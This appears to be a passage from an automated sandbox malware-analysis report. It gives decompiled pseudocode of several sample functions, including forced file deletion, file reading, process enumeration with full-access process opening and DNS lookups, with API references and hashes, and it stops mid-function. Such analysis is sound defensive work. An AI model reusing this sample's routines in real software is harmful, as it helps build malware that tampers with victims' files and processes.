											if(( *(_t165 - 4) & 0x0000ffff) == 0x2e) {
												break;
											}
											_t79 = _t165 - 2; // -8
											__eflags =  &(_t165[0xfffffffffffffffd]) - _t141;
											_t165 = _t79;
											if(__eflags > 0) {
												continue;
											}
											goto L66;
										}
										_t147 = _a16;
										__eflags = _t147;
										if(__eflags == 0) {
											 *(_t165 - 2) = 0x780065;
											_t165[1] = 0x65;
											_t165 =  &(_t165[1]);
										} else {
											__eflags = _t147 - 1;
											if(__eflags != 0) {
												_t165 =  &(_t165[0xffffffffffffffff]);
												__eflags = _t165;
											} else {
												 *(_t165 - 2) = 0x73006a;
											}
										}
										_t165[1] = 0;
										goto L66;
									}
									_t167 = 0xfffffdf8;
									while(1) {
										_t178 =  *(_v0 +  &(_t167[0x104])) & 0x0000ffff;
										__eflags = _t178;
										if(_t178 == 0) {
											break;
										}
										 *(_t141 +  &(_t167[0x104])) = _t178;
										_t167 =  &(_t167[1]);
										__eflags = _t167;
										if(_t167 != 0) {
											continue;
										}
										 *((short*)(_t141 +  &(_t167[0x103]))) = 0;
										_v252 = 0x8007007a;
										goto L30;
									}
									 *(_t141 +  &(_t167[0x104])) = 0;
									_v252 = 0;
									goto L52;
								} else {
									_t195 = _a8;
									_t169 = _v292;
									_t154 = 0x8007007a;
									goto L16;
								}
							}
							__eflags = _t155 - 0x7ffffffd;
							_t155 = _t155 + 1;
							if(__eflags != 0) {
								continue;
							}
							goto L11;
						}
						_t123[_t155] = 0;
						goto L18;
					}
				}
			}

0x005cfa9a
0x005cfaa1
0x005cfaaf
0x005cfab4
0x005cfab7
0x005cfabc
0x005cfac3
0x005cfac3
0x005cfac8
0x005cfd07
0x005cfd07
0x00000000
0x005cface
0x005cfad0
0x005cfad5
0x005cfad6
0x005cfade
0x005cfadf
0x005cfae8
0x00000000
0x005cfaea
0x005cfaea
0x005cfaf2
0x00000000
0x005cfaf2
0x005cfae8
0x005cfaff
0x005cfaff
0x005cfb06
0x005cfb0a
0x005cfb10
0x005cfb15
0x005cfb18
0x005cfb1e
0x005cfb20
0x005cfb24
0x005cfb8c
0x005cfd0e
0x005cfd13
0x005cfd2c
0x005cfd30
0x005cfd32
0x005cfd35
0x005cfd3a
0x005cfd3a
0x005cfd3d
0x005cfd3f
0x005cfd41
0x005cfd44
0x005cfd46
0x005cfd49
0x005cfd52
0x005cfd57
0x005cfd5a
0x005cfd5a
0x005cfd46
0x005cfd15
0x005cfd17
0x005cfd19
0x005cfd1f
0x005cfd22
0x005cfd27
0x005cfd27
0x005cfd1f
0x005cfd17
0x005cfd61
0x005cfd67
0x005cfd6a
0x005cfd6f
0x005cfd6f
0x005cfd72
0x005cfd78
0x005cfd7b
0x005cfd80
0x005cfd80
0x005cfd83
0x005cfd89
0x005cfd8c
0x005cfd91
0x005cfda2
0x005cfda2
0x005cfb26
0x005cfb28
0x005cfb98
0x005cfb9d
0x005cfb9f
0x005cfb9f
0x005cfba4
0x005cfba4
0x005cfba8
0x00000000
0x005cfb2a
0x005cfb2a
0x005cfb2d
0x005cfb2d
0x005cfb30
0x005cfb34
0x005cfb38
0x005cfb3d
0x005cfb3f
0x005cfb3f
0x005cfb41
0x005cfb41
0x005cfb45
0x005cfb48
0x00000000
0x00000000
0x005cfb4a
0x005cfb4e
0x005cfb51
0x005cfb57
0x005cfb59
0x005cfb5c
0x005cfb69
0x005cfb6d
0x005cfb6f
0x005cfb72
0x005cfb78
0x005cfbba
0x005cfbc5
0x005cfbcc
0x005cfbd8
0x005cfbdd
0x005cfbe4
0x005cfbe6
0x005cfd02
0x005cfd02
0x00000000
0x005cfd02
0x005cfbec
0x005cfbf0
0x005cfbf3
0x00000000
0x00000000
0x005cfbf9
0x005cfbfd
0x005cfc08
0x005cfc0f
0x005cfc13
0x005cfc19
0x005cfc1d
0x005cfc21
0x005cfc25
0x005cfc27
0x005cfc29
0x005cfc2d
0x005cfc31
0x005cfc35
0x00000000
0x00000000
0x005cfc3b
0x005cfc3d
0x00000000
0x00000000
0x005cfc48
0x005cfc4c
0x005cfc51
0x005cfc53
0x005cfda5
0x005cfdaa
0x00000000
0x005cfdaa
0x005cfc5d
0x005cfc64
0x005cfc66
0x005cfc6b
0x005cfe41
0x005cfe49
0x005cfe4b
0x005cfe50
0x005cfe55
0x005cfe58
0x005cfe5a
0x005cfeab
0x005cfeb0
0x00000000
0x005cfeb0
0x005cfe63
0x005cfe67
0x005cfe6c
0x005cfe6d
0x005cfe6e
0x005cfe71
0x005cfe74
0x005cfe79
0x005cfe7b
0x005cfe9a
0x005cfe9a
0x005cfe9f
0x00000000
0x005cfe9f
0x005cfe7d
0x005cfe82
0x00000000
0x00000000
0x005cfe8e
0x005cfe93
0x005cfe96
0x005cfe98
0x005cfebc
0x005cfebe
0x005cfedc
0x005cfee3
0x005cfee5
0x005cfeff
0x005cfeff
0x005cff04
0x005cff0a
0x005cff0f
0x005cff0f
0x00000000
0x005cff04
0x005cfeeb
0x005cfeed
0x005cfeef
0x00000000
0x00000000
0x005cfef5
0x005cfef7
0x005cfef7
0x00000000
0x005cfef7
0x005cfecb
0x005cfed0
0x005cfed3
0x005cfed5
0x00000000
0x00000000
0x00000000
0x005cfed7
0x00000000
0x005cfe98
0x005cfc78
0x005cfc7d
0x005cfc80
0x005cfc82
0x005cfc85
0x005cfdb6
0x005cfdbb
0x00000000
0x005cfdbb
0x005cfc8b
0x005cfc93
0x005cfcd1
0x005cfcd7
0x005cfcdd
0x005cfce4
0x005cfce9
0x005cfcf4
0x005cfcfa
0x005cfdd9
0x005cfdd9
0x005cfdd9
0x005cfddb
0x005cfddd
0x005cfddd
0x005cfde1
0x00000000
0x00000000
0x005cfde3
0x005cfde4
0x005cfde7
0x005cfded
0x00000000
0x00000000
0x00000000
0x005cfded
0x005cfdef
0x005cfdf1
0x00000000
0x00000000
0x005cfdf3
0x005cfdf3
0x005cfdf6
0x005cfdfa
0x005cfdfd
0x00000000
0x00000000
0x005cfdff
0x005cfe05
0x005cfe07
0x005cfe09
0x00000000
0x00000000
0x00000000
0x005cfe0b
0x005cfe0d
0x005cfe14
0x005cfe16
0x005cfe26
0x005cfe2d
0x005cfe33
0x005cfe18
0x005cfe18
0x005cfe1b
0x005cfe38
0x005cfe38
0x005cfe1d
0x005cfe1d
0x005cfe1d
0x005cfe1b
0x005cfe3b
0x00000000
0x005cfe3b
0x005cfc95
0x005cfc9a
0x005cfca1
0x005cfca9
0x005cfcac
0x00000000
0x00000000
0x005cfcb2
0x005cfcba
0x005cfcba
0x005cfcbd
0x00000000
0x00000000
0x005cfcbf
0x005cfcc9
0x00000000
0x005cfcc9
0x005cfdc7
0x005cfdd1
0x00000000
0x005cfb7a
0x005cfb7a
0x005cfb81
0x005cfb85
0x00000000
0x005cfb85
0x005cfb78
0x005cfb5e
0x005cfb64
0x005cfb67
0x00000000
0x00000000
0x00000000
0x005cfb67
0x005cfbb4
0x00000000
0x005cfbb4
0x005cfb28

APIs

DeleteFileW.KERNEL32(?), ref: 005CFD49

Strings

, xrefs: 005CFE7D
z, xrefs: 005CFCC9

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: DeleteFile
String ID: $z
API String ID: 4033686569-2251613814
Opcode ID: a3ec109eb1490a8ad0a94946fbb33afb63550ed932dfef39ac819158147d5a79
Instruction ID: e57dcb60bd1225bc1fae1a69241ec99cc1398857c7bb2b515bb48763bbf3f76d
Opcode Fuzzy Hash: a3ec109eb1490a8ad0a94946fbb33afb63550ed932dfef39ac819158147d5a79
Instruction Fuzzy Hash: F5C181B06043019FDB20DF94D849F6ABBE6FF84304F19892EE94A8B2A1D775D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005CC510, Relevance: 9.1, APIs: 6, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005CC510(void* __eax, void* __ecx) {
				void* _t7;
				long _t9;
				void* _t13;
				void* _t22;
				long _t23;
				long _t25;
				DWORD* _t26;

				_t23 = 0;
				 *_t26 = 0;
				_t7 = CreateFileW(_t26[6], 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t7 != 0xffffffff) {
					_t22 = _t7;
					_t23 = 0;
					_t9 = SetFilePointer(_t7, 0, 0, 2);
					if(_t9 == 0xffffffff) {
						L7:
						CloseHandle(_t22);
					} else {
						_t25 = _t9;
						SetFilePointer(_t22, 0, 0, 0);
						_t2 = _t25 - 1; // -1
						if(_t2 > 0xffffe) {
							goto L7;
						} else {
							_t13 = E005C3180(_t25, 0);
							_t26 =  &(_t26[2]);
							if(_t13 == 0) {
								goto L7;
							} else {
								_t20 = _t13;
								if(ReadFile(_t22, _t13, _t25, _t26, 0) == 0) {
									E005C91E0(_t20);
									_t26 =  &(_t26[1]);
									goto L7;
								} else {
									CloseHandle(_t22);
									_t23 = E005CB9F0(_t20, _t26[1], _t26[7]);
									E005C91E0(_t20);
									_t26 =  &(_t26[4]);
								}
							}
						}
					}
				}
				return _t23;
			}

0x005cc519
0x005cc51b
0x005cc52f
0x005cc538
0x005cc53e
0x005cc540
0x005cc547
0x005cc550
0x005cc5ba
0x005cc5bb
0x005cc552
0x005cc552
0x005cc558
0x005cc55e
0x005cc566
0x00000000
0x005cc568
0x005cc56b
0x005cc570
0x005cc575
0x00000000
0x005cc577
0x005cc577
0x005cc589
0x005cc5b2
0x005cc5b7
0x00000000
0x005cc58b
0x005cc590
0x005cc5a4
0x005cc5a7
0x005cc5ac
0x005cc5ac
0x005cc589
0x005cc575
0x005cc566
0x005cc550
0x005cc5ca

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005CC52F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005CC547
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CC558

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005CC581
CloseHandle.KERNEL32(00000000), ref: 005CC590

Part of subcall function 005CB9F0: CreateFileW.KERNEL32(C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005CBA3B

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

CloseHandle.KERNEL32(00000000), ref: 005CC5BB

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$Heap$CloseCreateHandlePointer$AllocateFreeProcessRead
String ID:
API String ID: 739418787-0
Opcode ID: e7035eab733dd50cefc89cf8c8ff7db3d6c3c4547ed53a5364e638747dbd24ad
Instruction ID: 63519dcb395aada45f22b2646d3e77cd836e76b9bc6915c731850c30826a8fea
Opcode Fuzzy Hash: e7035eab733dd50cefc89cf8c8ff7db3d6c3c4547ed53a5364e638747dbd24ad
Instruction Fuzzy Hash: 2C11BF715011147FE6302AA56C8EFAB3F9CEF827B5F14052AF90ED2291E661AD09D2E1

Uniqueness

Uniqueness Score: -1.00%

Function 005D0230, Relevance: 9.1, APIs: 6, Instructions: 68
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E005D0230(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t13;
				intOrPtr* _t24;
				intOrPtr* _t25;
				struct _SECURITY_ATTRIBUTES* _t28;
				intOrPtr* _t29;
				void* _t31;

				_t28 = 0;
				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t13 != 0xffffffff) {
					_t31 = _t13;
					if(GetFileTime(_t31,  &_v20,  &_v28,  &(_v28.dwHighDateTime)) == 0) {
						_t28 = 0;
					} else {
						_t24 = _a8;
						_t29 = _a12;
						if(_t24 != 0) {
							 *_t24 =  *0x5d9ee4(_v20.dwLowDateTime, _v20.dwHighDateTime, 0x989680, 0) + 0x49ef6f00;
						}
						_t25 = _a16;
						if(_t29 != 0) {
							 *_t29 =  *0x5d9ee4(_v28.dwLowDateTime, _v28.dwHighDateTime.dwLowDateTime, 0x989680, 0) + 0x49ef6f00;
						}
						_t28 = 1;
						if(_t25 != 0) {
							 *_t25 =  *0x5d9ee4(_v36, _v32, 0x989680, 0) + 0x49ef6f00;
						}
					}
					CloseHandle(_t31);
				}
				return _t28;
			}

0x005d0236
0x005d0248
0x005d0251
0x005d0257
0x005d026f
0x005d02e2
0x005d0271
0x005d0271
0x005d0275
0x005d027b
0x005d0297
0x005d0297
0x005d0299
0x005d029f
0x005d02bb
0x005d02bb
0x005d02bf
0x005d02c2
0x005d02de
0x005d02de
0x005d02c2
0x005d02e5
0x005d02e5
0x005d02f3

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005D0248
GetFileTime.KERNEL32(00000000,?,?,?,?,?,005D0385,00000000), ref: 005D0267
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D028C
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02B0
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02D3
CloseHandle.KERNEL32(00000000), ref: 005D02E5

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: _aulldiv$File$CloseCreateHandleTime
String ID:
API String ID: 504125806-0
Opcode ID: a925d464e29bba63017a4f287cfd0f0ff31f663b7e1e95925a49861b58adfcc0
Instruction ID: 5d30b7e8c765c7eaa509aee61c8a9cd47f8d2d2064dffa2b4f5f9a251ddb9209
Opcode Fuzzy Hash: a925d464e29bba63017a4f287cfd0f0ff31f663b7e1e95925a49861b58adfcc0
Instruction Fuzzy Hash: AB119A32201341BBD7209F28DC49F5B7BAAFFC4B08F14491BF695A62A4D6708C15DB56

Uniqueness

Uniqueness Score: -1.00%

Function 005C9DB0, Relevance: 9.1, APIs: 6, Instructions: 68
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C9DB0(void* __eflags) {
				void* _t11;
				void* _t13;
				signed char _t16;
				WCHAR* _t20;
				signed int _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				WCHAR* _t29;

				_t11 = E005CB7A0( *0x5d9c40);
				_t29 = _t28 + 4;
				if(_t11 == 0) {
					_t22 = 0;
				} else {
					_t26 = _t11;
					_t13 = 0xfffffc00;
					while(1) {
						_t21 =  *(_t26 + _t13 + 0x400) & 0x0000ffff;
						if(_t21 == 0) {
							break;
						}
						 *(_t29 + _t13 + 0x500) = _t21;
						_t13 = _t13 + 2;
						if(_t13 != 0) {
							continue;
						} else {
							 *((short*)(_t29 + _t13 + 0x4fe)) = 0;
							_t22 = 0;
						}
						L13:
						E005C91E0(_t26);
						goto L14;
					}
					_t23 = _t29;
					 *(_t29 + _t13 + 0x500) = 0;
					E005D4520(_t23, 0x69);
					_t20 =  &(_t29[0x80]);
					PathRenameExtensionW(_t20, _t23);
					_t16 = GetFileAttributesW(_t20);
					_t22 = 0;
					if((_t16 & 0x00000010) == 0) {
						_t27 = 0;
						while(DeleteFileW(_t20) == 0) {
							if(SetFileAttributesW(_t20, 0x80) == 0) {
								Sleep(0x3e8);
							}
							Sleep(0x3e8);
							_t27 = _t27 + 1;
							if(_t27 < 5) {
								continue;
							}
							break;
						}
						_t22 = 1;
					}
					goto L13;
				}
				L14:
				return _t22;
			}

0x005c9dc0
0x005c9dc5
0x005c9dca
0x005c9dfb
0x005c9dcc
0x005c9dcc
0x005c9dce
0x005c9dd3
0x005c9dd3
0x005c9dde
0x00000000
0x00000000
0x005c9de0
0x005c9de8
0x005c9deb
0x00000000
0x005c9ded
0x005c9ded
0x005c9df7
0x005c9df7
0x005c9e6c
0x005c9e6d
0x00000000
0x005c9e72
0x005c9dff
0x005c9e01
0x005c9e0e
0x005c9e16
0x005c9e1f
0x005c9e26
0x005c9e2c
0x005c9e30
0x005c9e38
0x005c9e3a
0x005c9e53
0x005c9e5a
0x005c9e5a
0x005c9e61
0x005c9e63
0x005c9e67
0x00000000
0x00000000
0x00000000
0x005c9e67
0x005c9e6b
0x005c9e6b
0x00000000
0x005c9e30
0x005c9e75
0x005c9e81

APIs

PathRenameExtensionW.SHLWAPI(?), ref: 005C9E1F
GetFileAttributesW.KERNEL32(?), ref: 005C9E26
DeleteFileW.KERNEL32(?), ref: 005C9E3B
SetFileAttributesW.KERNEL32(?,00000080), ref: 005C9E4B
Sleep.KERNEL32(000003E8), ref: 005C9E5A
Sleep.KERNEL32(000003E8), ref: 005C9E61

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$AttributesSleep$DeleteExtensionPathRename
String ID:
API String ID: 1756145437-0
Opcode ID: ea4ea9cedbb261927446a44fe7b02fed37d96128bfbde33f7f5611e343608966
Instruction ID: d166fa59cabdc955f33f317d8fc6909aabb7bc3803109817d96ebd939faf9c03
Opcode Fuzzy Hash: ea4ea9cedbb261927446a44fe7b02fed37d96128bfbde33f7f5611e343608966
Instruction Fuzzy Hash: 721127715003045BE730B769EC4EF6B3B9DFFD0759F15143EE54A86191FA3448058252

Uniqueness

Uniqueness Score: -1.00%

Function 005C9A60, Relevance: 9.1, APIs: 6, Instructions: 61
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C9A60(intOrPtr __ecx) {
				void** _v0;
				WCHAR* _v4;
				char _v544;
				long _v572;
				char _v576;
				void* _v580;
				void* _t9;
				struct tagPROCESSENTRY32W* _t11;
				void* _t14;
				int _t17;
				WCHAR* _t18;
				intOrPtr _t23;
				WCHAR* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t23 = __ecx;
				_v572 = 0x22c;
				_t9 = CreateToolhelp32Snapshot(2, 0);
				if(_t9 == 0xffffffff) {
					_t17 = 0;
					L10:
					return _t17;
				}
				_t25 = _t9;
				_t11 =  &_v576;
				Process32FirstW(_t25, _t11);
				_t17 = 0;
				if(_t11 != 1) {
					L9:
					CloseHandle(_t25);
					goto L10;
				}
				 *_t27 = _t23;
				_t24 = _v4;
				_t18 =  &_v544;
				while(lstrcmpiW(_t18, _t24) != 0) {
					if(Process32NextW(_t25,  &_v580) == 1) {
						continue;
					}
					_t17 = 0;
					goto L9;
				}
				_t14 = OpenProcess(0x1fffff, 0, _v572);
				_t17 = 0;
				if(_t14 != 0) {
					_t17 = 1;
					 *( *_t27 + 0x78) = 0;
					 *_v0 = _t14;
				}
				goto L9;
			}

0x005c9a6a
0x005c9a6c
0x005c9a78
0x005c9a81
0x005c9ac9
0x005c9b04
0x005c9b10
0x005c9b10
0x005c9a83
0x005c9a85
0x005c9a8b
0x005c9a91
0x005c9a96
0x005c9afd
0x005c9afe
0x00000000
0x005c9afe
0x005c9a98
0x005c9a9b
0x005c9aa8
0x005c9aac
0x005c9ac3
0x00000000
0x00000000
0x005c9ac5
0x00000000
0x005c9ac5
0x005c9ad8
0x005c9ae0
0x005c9ae5
0x005c9af3
0x005c9af4
0x005c9afb
0x005c9afb
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005C9A78
Process32FirstW.KERNEL32(00000000,0000022C), ref: 005C9A8B
lstrcmpiW.KERNEL32(?,?), ref: 005C9AAE
Process32NextW.KERNEL32(00000000,0000022C), ref: 005C9ABA
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005C9AD8
CloseHandle.KERNEL32(00000000), ref: 005C9AFE

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 3301242143-0
Opcode ID: df07ca65d4aab85767cb21b078c200c835025d89ebfbbaf922059854aec050f0
Instruction ID: ec0dc2c98dedaa73ce45535a3368246891d55d6ad012572769d894cb44435601
Opcode Fuzzy Hash: df07ca65d4aab85767cb21b078c200c835025d89ebfbbaf922059854aec050f0
Instruction Fuzzy Hash: DF119E31205200AFD3206FA4DCCCF6BBBE8FB85314F14452EF659862A0D7758C09D761

Uniqueness

Uniqueness Score: -1.00%

Function 005C7A60, Relevance: 7.7, APIs: 5, Instructions: 157
networkCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E005C7A60() {
				intOrPtr _v4;
				char _v416;
				char _v624;
				char _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				char _v868;
				intOrPtr _v884;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t48;
				intOrPtr _t52;
				signed int _t54;
				char _t58;
				unsigned int _t62;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t69;
				char* _t71;

				_t72 =  &_v848;
				_t58 = 0;
				_v860 = 0;
				_v864 = 0;
				_push( &_v416);
				_push(0x202);
				if( *0x5d9eac() != 0) {
					L31:
					_t32 = _v868;
					if(_v868 != 0) {
						E005C91E0(_t32);
					}
					 *0x5d9eb4();
					return _t58;
				}
				_t36 = E005C3180(0x100, 0);
				_t72 =  &_v848 + 8;
				_t69 = _t36;
				if(_t36 == 0) {
					L26:
					_t58 = 0;
					_t67 = 0;
					L27:
					if(_t69 != 0) {
						E005C91E0(_t69);
						_t72 = _t72 + 4;
					}
					if(_t67 != 0) {
						E005C91E0(_t67);
						_t72 = _t72 + 4;
					}
					goto L31;
				}
				_t39 = E005CA3C0(_v4);
				if(_t39 == 0) {
					goto L26;
				}
				_v864 = _t39;
				_t40 = 0;
				_t68 = 0;
				_v860 = _t69;
				L4:
				L4:
				if(_t40 != 0) {
					E005C91E0(_t40);
					_t72 = _t72 + 4;
				}
				_t41 =  *_t72;
				_v868 = 0;
				if(_t41 != 0) {
					 *0x5d9ea4(_t41);
				}
				_t58 = 0;
				 *_t72 = 0;
				E005D4520( &_v624, 0x40);
				_t8 = _t68 + 0x12; // 0x13
				_t71 =  &_v824;
				E005CD470(_t71, _t8);
				_push(_t71);
				_t69 = _v860;
				E005D68E0(_t69, 0x80,  &_v624, _v864);
				_t47 = E005D2E70(_t69, 0,  &_v868, 0xffffffff);
				_t72 = _t72 + 0x34;
				if(_t47 == 0) {
					goto L23;
				}
				_v828 = 0;
				_v832 = 0;
				_v836 = 0;
				_v840 = 0;
				_v844 = 0;
				_v856 = 0;
				_v848 = 1;
				_v852 = 2;
				 *0x5d9ea8(_v868, 0,  &_v856, _t72);
				if(0 == 0) {
					_t52 =  *_t72;
					if(_t52 == 0) {
						goto L10;
					}
					_t54 =  *( *((intOrPtr*)(_t52 + 0x18)) + 4);
					if(_t68 == 0) {
						_t27 = _t54 - 0x200007f; // -33554559
						_t62 = _t27;
						asm("rol edx, 0x8");
						if(_t62 >= 8) {
							L19:
							if((_t54 | 0x01000000) == 0xb00007f) {
								L22:
								_t58 = 1;
								goto L23;
							}
							L20:
							_t68 = _t68 + 1;
							L11:
							_t40 = _v884;
							goto L4;
						}
						asm("bt edx, ecx");
						if(_t62 >> 0x18 < 0) {
							goto L22;
						}
						goto L19;
					}
					_t26 = _t68 - 1; // -1
					if(_t26 > 2) {
						if(_t54 != 0x600007f) {
							goto L10;
						}
						goto L22;
					}
					if(_t54 != 0x200007f) {
						goto L20;
					}
					goto L22;
				}
				L10:
				_t68 = _t68 + 1;
				if(_t68 > 4) {
					goto L23;
				}
				goto L11;
				L23:
				_t48 =  *_t72;
				if(_t48 != 0) {
					 *0x5d9ea4(_t48);
				}
				_t67 = _v864;
				goto L27;
			}

0x005c7a64
0x005c7a6a
0x005c7a73
0x005c7a77
0x005c7a7a
0x005c7a7b
0x005c7a88
0x005c7c1d
0x005c7c1d
0x005c7c23
0x005c7c26
0x005c7c2b
0x005c7c2e
0x005c7c40
0x005c7c40
0x005c7a95
0x005c7a9a
0x005c7a9d
0x005c7aa1
0x005c7bff
0x005c7bff
0x005c7c01
0x005c7c03
0x005c7c05
0x005c7c08
0x005c7c0d
0x005c7c0d
0x005c7c12
0x005c7c15
0x005c7c1a
0x005c7c1a
0x00000000
0x005c7c12
0x005c7aae
0x005c7ab5
0x00000000
0x00000000
0x005c7abb
0x005c7abf
0x005c7ac1
0x005c7ac3
0x00000000
0x005c7ac7
0x005c7ac9
0x005c7acc
0x005c7ad1
0x005c7ad1
0x005c7ad4
0x005c7ad7
0x005c7ae1
0x005c7ae4
0x005c7ae4
0x005c7aea
0x005c7aec
0x005c7af9
0x005c7b01
0x005c7b05
0x005c7b0a
0x005c7b12
0x005c7b1d
0x005c7b22
0x005c7b33
0x005c7b38
0x005c7b3d
0x00000000
0x00000000
0x005c7b47
0x005c7b4b
0x005c7b4f
0x005c7b53
0x005c7b57
0x005c7b5b
0x005c7b5f
0x005c7b67
0x005c7b7a
0x005c7b82
0x005c7b93
0x005c7b98
0x00000000
0x00000000
0x005c7b9f
0x005c7ba2
0x005c7bb5
0x005c7bb5
0x005c7bbd
0x005c7bc3
0x005c7bd2
0x005c7bdc
0x005c7be8
0x005c7bea
0x00000000
0x005c7bea
0x005c7bde
0x005c7bde
0x005c7b8a
0x005c7b8a
0x00000000
0x005c7b8a
0x005c7bcd
0x005c7bd0
0x00000000
0x00000000
0x00000000
0x005c7bd0
0x005c7ba4
0x005c7baa
0x005c7be6
0x00000000
0x00000000
0x00000000
0x005c7be6
0x005c7bb1
0x00000000
0x00000000
0x00000000
0x005c7bb3
0x005c7b84
0x005c7b84
0x005c7b88
0x00000000
0x00000000
0x00000000
0x005c7beb
0x005c7beb
0x005c7bf0
0x005c7bf3
0x005c7bf3
0x005c7bf9
0x00000000

APIs

WSAStartup.WS2_32(00000202,?), ref: 005C7A80
WSACleanup.WS2_32 ref: 005C7C2E

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

FreeAddrInfoW.WS2_32(00000000), ref: 005C7AE4
getaddrinfo.WS2_32(?,00000000,00000002), ref: 005C7B7A
FreeAddrInfoW.WS2_32(00000000), ref: 005C7BF3

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: AddrFreeHeapInfo$AllocateCleanupProcessStartupgetaddrinfo
String ID:
API String ID: 2060111366-0
Opcode ID: dfe5de54cf8ba147c487adc365812c7bf860cea1d6713c1fb8bb331064000445
Instruction ID: 6057e7009fad9c59516f1c9d86652d7e0cf8a548ccaa901e5fba027e6d14d73e
Opcode Fuzzy Hash: dfe5de54cf8ba147c487adc365812c7bf860cea1d6713c1fb8bb331064000445
Instruction Fuzzy Hash: D9517C71908206AFE720DFA59C89F6BBAE8BF98748F04492DF449C2641F735DD048A62

Uniqueness

Uniqueness Score: -1.00%

Function 005D0090, Relevance: 7.6, APIs: 5, Instructions: 148
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E005D0090(void* __eax, intOrPtr* __ecx) {
				intOrPtr _t22;
				void* _t23;
				void* _t26;
				WCHAR** _t33;
				WCHAR** _t41;
				intOrPtr* _t49;
				void* _t59;
				WCHAR** _t60;
				WCHAR** _t61;
				WCHAR* _t78;
				void* _t79;
				intOrPtr* _t80;
				void* _t81;
